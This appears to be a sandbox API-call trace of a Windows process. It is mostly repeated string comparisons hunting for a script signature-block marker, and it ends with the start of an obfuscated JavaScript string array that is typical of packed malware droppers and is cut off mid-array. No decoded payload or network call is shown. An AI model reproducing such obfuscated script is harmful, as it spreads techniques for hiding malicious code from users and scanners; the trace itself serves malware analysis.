	[0104.583] wcsncmp (_String1="1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw6", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0104.583] wcsncmp (_String1="xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0104.583] wcsncmp (_String1="Zw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0104.583] wcsncmp (_String1="w7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.583] wcsncmp (_String1="7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0104.583] wcsncmp (_String1="jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0104.583] wcsncmp (_String1="Du8OwwrtSXDnDgMOwa0XCr8OAw69Dw79y", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0104.583] wcsncmp (_String1="u8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0104.583] wcsncmp (_String1="8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0104.583] wcsncmp (_String1="OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0104.583] wcsncmp (_String1="wwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.583] wcsncmp (_String1="wrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.583] wcsncmp (_String1="rtSXDnDgMOwa0XCr8OAw69Dw79yA8OW',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0104.583] wcsncmp (_String1="tSXDnDgMOwa0XCr8OAw69Dw79yA8OW','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0104.583] wcsncmp (_String1="SXDnDgMOwa0XCr8OAw69Dw79yA8OW','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 70
	[0104.583] wcsncmp (_String1="XDnDgMOwa0XCr8OAw69Dw79yA8OW','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0104.583] wcsncmp (_String1="DnDgMOwa0XCr8OAw69Dw79yA8OW','w5/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0104.583] wcsncmp (_String1="nDgMOwa0XCr8OAw69Dw79yA8OW','w5/C", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0104.583] wcsncmp (_String1="DgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0104.583] wcsncmp (_String1="gMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0104.583] wcsncmp (_String1="MOwa0XCr8OAw69Dw79yA8OW','w5/Cn8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0104.583] wcsncmp (_String1="Owa0XCr8OAw69Dw79yA8OW','w5/Cn8KK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0104.583] wcsncmp (_String1="wa0XCr8OAw69Dw79yA8OW','w5/Cn8KKb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.583] wcsncmp (_String1="a0XCr8OAw69Dw79yA8OW','w5/Cn8KKbM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0104.583] wcsncmp (_String1="0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35
	[0104.583] wcsncmp (_String1="XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0104.583] wcsncmp (_String1="Cr8OAw69Dw79yA8OW','w5/Cn8KKbMK5H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0104.583] wcsncmp (_String1="r8OAw69Dw79yA8OW','w5/Cn8KKbMK5Hs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0104.583] wcsncmp (_String1="8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0104.583] wcsncmp (_String1="OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOe", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0104.583] wcsncmp (_String1="Aw69Dw79yA8OW','w5/Cn8KKbMK5HsOef", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0104.583] wcsncmp (_String1="w69Dw79yA8OW','w5/Cn8KKbMK5HsOefs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.583] wcsncmp (_String1="69Dw79yA8OW','w5/Cn8KKbMK5HsOefsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 41
	[0104.583] wcsncmp (_String1="9Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0104.584] wcsncmp (_String1="Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0104.584] wcsncmp (_String1="w79yA8OW','w5/Cn8KKbMK5HsOefsOg',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.584] wcsncmp (_String1="79yA8OW','w5/Cn8KKbMK5HsOefsOg','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0104.584] wcsncmp (_String1="9yA8OW','w5/Cn8KKbMK5HsOefsOg','M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0104.584] wcsncmp (_String1="yA8OW','w5/Cn8KKbMK5HsOefsOg','ME", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 108
	[0104.584] wcsncmp (_String1="A8OW','w5/Cn8KKbMK5HsOefsOg','MEr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0104.584] wcsncmp (_String1="8OW','w5/Cn8KKbMK5HsOefsOg','MErC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0104.584] wcsncmp (_String1="OW','w5/Cn8KKbMK5HsOefsOg','MErCs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0104.584] wcsncmp (_String1="W','w5/Cn8KKbMK5HsOefsOg','MErCsE", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 74
	[0104.584] wcsncmp (_String1="','w5/Cn8KKbMK5HsOefsOg','MErCsEP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0104.584] wcsncmp (_String1=",'w5/Cn8KKbMK5HsOefsOg','MErCsEPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0104.584] wcsncmp (_String1="'w5/Cn8KKbMK5HsOefsOg','MErCsEPDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0104.584] wcsncmp (_String1="w5/Cn8KKbMK5HsOefsOg','MErCsEPDhc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.584] wcsncmp (_String1="5/Cn8KKbMK5HsOefsOg','MErCsEPDhcK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0104.584] wcsncmp (_String1="/Cn8KKbMK5HsOefsOg','MErCsEPDhcKa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0104.584] wcsncmp (_String1="Cn8KKbMK5HsOefsOg','MErCsEPDhcKac", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0104.584] wcsncmp (_String1="n8KKbMK5HsOefsOg','MErCsEPDhcKacR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0104.584] wcsncmp (_String1="8KKbMK5HsOefsOg','MErCsEPDhcKacRH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0104.584] wcsncmp (_String1="KKbMK5HsOefsOg','MErCsEPDhcKacRHC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0104.584] wcsncmp (_String1="KbMK5HsOefsOg','MErCsEPDhcKacRHCm", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0104.584] wcsncmp (_String1="bMK5HsOefsOg','MErCsEPDhcKacRHCmA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0104.584] wcsncmp (_String1="MK5HsOefsOg','MErCsEPDhcKacRHCmA=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0104.584] wcsncmp (_String1="K5HsOefsOg','MErCsEPDhcKacRHCmA==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0104.584] wcsncmp (_String1="5HsOefsOg','MErCsEPDhcKacRHCmA=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0104.584] wcsncmp (_String1="HsOefsOg','MErCsEPDhcKacRHCmA==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0104.584] wcsncmp (_String1="sOefsOg','MErCsEPDhcKacRHCmA==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0104.584] wcsncmp (_String1="OefsOg','MErCsEPDhcKacRHCmA==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0104.584] wcsncmp (_String1="efsOg','MErCsEPDhcKacRHCmA==','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0104.584] wcsncmp (_String1="fsOg','MErCsEPDhcKacRHCmA==','woz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0104.584] wcsncmp (_String1="sOg','MErCsEPDhcKacRHCmA==','wozD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0104.584] wcsncmp (_String1="Og','MErCsEPDhcKacRHCmA==','wozDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0104.584] wcsncmp (_String1="g','MErCsEPDhcKacRHCmA==','wozDhs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0104.584] wcsncmp (_String1="','MErCsEPDhcKacRHCmA==','wozDhsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0104.584] wcsncmp (_String1=",'MErCsEPDhcKacRHCmA==','wozDhsKi", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0104.584] wcsncmp (_String1="'MErCsEPDhcKacRHCmA==','wozDhsKiw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0104.584] wcsncmp (_String1="MErCsEPDhcKacRHCmA==','wozDhsKiwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0104.584] wcsncmp (_String1="ErCsEPDhcKacRHCmA==','wozDhsKiwrP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0104.584] wcsncmp (_String1="rCsEPDhcKacRHCmA==','wozDhsKiwrPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0104.584] wcsncmp (_String1="CsEPDhcKacRHCmA==','wozDhsKiwrPDl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0104.585] wcsncmp (_String1="sEPDhcKacRHCmA==','wozDhsKiwrPDl8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0104.585] wcsncmp (_String1="EPDhcKacRHCmA==','wozDhsKiwrPDl8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0104.585] wcsncmp (_String1="PDhcKacRHCmA==','wozDhsKiwrPDl8Kx", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0104.585] wcsncmp (_String1="DhcKacRHCmA==','wozDhsKiwrPDl8KxF", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0104.585] wcsncmp (_String1="hcKacRHCmA==','wozDhsKiwrPDl8KxFA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0104.585] wcsncmp (_String1="cKacRHCmA==','wozDhsKiwrPDl8KxFAY", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0104.585] wcsncmp (_String1="KacRHCmA==','wozDhsKiwrPDl8KxFAY=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0104.585] wcsncmp (_String1="acRHCmA==','wozDhsKiwrPDl8KxFAY='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0104.585] wcsncmp (_String1="cRHCmA==','wozDhsKiwrPDl8KxFAY=',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0104.585] wcsncmp (_String1="RHCmA==','wozDhsKiwrPDl8KxFAY=','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0104.585] wcsncmp (_String1="HCmA==','wozDhsKiwrPDl8KxFAY=','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0104.585] wcsncmp (_String1="CmA==','wozDhsKiwrPDl8KxFAY=','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0104.585] wcsncmp (_String1="mA==','wozDhsKiwrPDl8KxFAY=','woH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 96
	[0104.585] wcsncmp (_String1="A==','wozDhsKiwrPDl8KxFAY=','woHD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0104.585] wcsncmp (_String1="==','wozDhsKiwrPDl8KxFAY=','woHDt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0104.585] wcsncmp (_String1="=','wozDhsKiwrPDl8KxFAY=','woHDt2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0104.585] wcsncmp (_String1="','wozDhsKiwrPDl8KxFAY=','woHDt2Z", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0104.585] wcsncmp (_String1=",'wozDhsKiwrPDl8KxFAY=','woHDt2Zc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0104.585] wcsncmp (_String1="'wozDhsKiwrPDl8KxFAY=','woHDt2ZcP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0104.585] wcsncmp (_String1="wozDhsKiwrPDl8KxFAY=','woHDt2ZcPM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.585] wcsncmp (_String1="ozDhsKiwrPDl8KxFAY=','woHDt2ZcPMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0104.585] wcsncmp (_String1="zDhsKiwrPDl8KxFAY=','woHDt2ZcPMOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0104.585] wcsncmp (_String1="DhsKiwrPDl8KxFAY=','woHDt2ZcPMOsG", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0104.585] wcsncmp (_String1="hsKiwrPDl8KxFAY=','woHDt2ZcPMOsGX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0104.585] wcsncmp (_String1="sKiwrPDl8KxFAY=','woHDt2ZcPMOsGXt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0104.585] wcsncmp (_String1="KiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0104.585] wcsncmp (_String1="iwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0104.585] wcsncmp (_String1="wrPDl8KxFAY=','woHDt2ZcPMOsGXtZQc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.585] wcsncmp (_String1="rPDl8KxFAY=','woHDt2ZcPMOsGXtZQcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0104.585] wcsncmp (_String1="PDl8KxFAY=','woHDt2ZcPMOsGXtZQcOI", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0104.585] wcsncmp (_String1="Dl8KxFAY=','woHDt2ZcPMOsGXtZQcOIw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0104.585] wcsncmp (_String1="l8KxFAY=','woHDt2ZcPMOsGXtZQcOIwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0104.585] wcsncmp (_String1="8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0104.585] wcsncmp (_String1="KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0104.585] wcsncmp (_String1="xFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0104.585] wcsncmp (_String1="FAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57
	[0104.585] wcsncmp (_String1="AY=','woHDt2ZcPMOsGXtZQcOIwrnDj1l", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0104.585] wcsncmp (_String1="Y=','woHDt2ZcPMOsGXtZQcOIwrnDj1lV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 76
	[0104.585] wcsncmp (_String1="=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0104.585] wcsncmp (_String1="','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0104.795] wcsncmp (_String1=",'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0104.795] wcsncmp (_String1="'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOU", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0104.795] wcsncmp (_String1="woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOUR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.795] wcsncmp (_String1="oHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0104.795] wcsncmp (_String1="HDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHf", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0104.795] wcsncmp (_String1="Dt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0104.795] wcsncmp (_String1="t2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0104.795] wcsncmp (_String1="2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0104.795] wcsncmp (_String1="ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0104.795] wcsncmp (_String1="cPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0k", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0104.795] wcsncmp (_String1="PMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0104.795] wcsncmp (_String1="MOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0104.795] wcsncmp (_String1="OsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4t", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0104.795] wcsncmp (_String1="sGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0104.795] wcsncmp (_String1="GXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 58
	[0104.795] wcsncmp (_String1="XtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0104.795] wcsncmp (_String1="tZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4R", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0104.795] wcsncmp (_String1="ZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0104.795] wcsncmp (_String1="QcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0104.795] wcsncmp (_String1="cOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0104.795] wcsncmp (_String1="OIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0104.795] wcsncmp (_String1="IwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 60
	[0104.795] wcsncmp (_String1="wrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0104.795] wcsncmp (_String1="rnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0104.795] wcsncmp (_String1="nDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0104.795] wcsncmp (_String1="Dj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Om", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0104.795] wcsncmp (_String1="j1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0104.795] wcsncmp (_String1="1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0104.795] wcsncmp (_String1="lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5J", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0104.795] wcsncmp (_String1="VNsOURHfDgl0kw4tDw4RSw7HCn8Omw5Jp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0104.795] wcsncmp (_String1="NsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0104.796] wcsncmp (_String1="sOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0104.796] wcsncmp (_String1="OURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0104.796] wcsncmp (_String1="URHfDgl0kw4tDw4RSw7HCn8Omw5JpXDot", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 72
	[0104.796] wcsncmp (_String1="RHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0104.796] wcsncmp (_String1="HfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0104.796] wcsncmp (_String1="fDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0104.796] wcsncmp (_String1="Dgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0104.797] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0104.797] CloseCodeAuthzLevel () returned 0x1
	[0104.797] FreeLibrary (hLibModule=0x7fefd710000) returned 1
	[0104.797] ??2@YAPEAX_K@Z () returned 0x42f3f0
	[0104.798] SysStringLen (param_1="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','O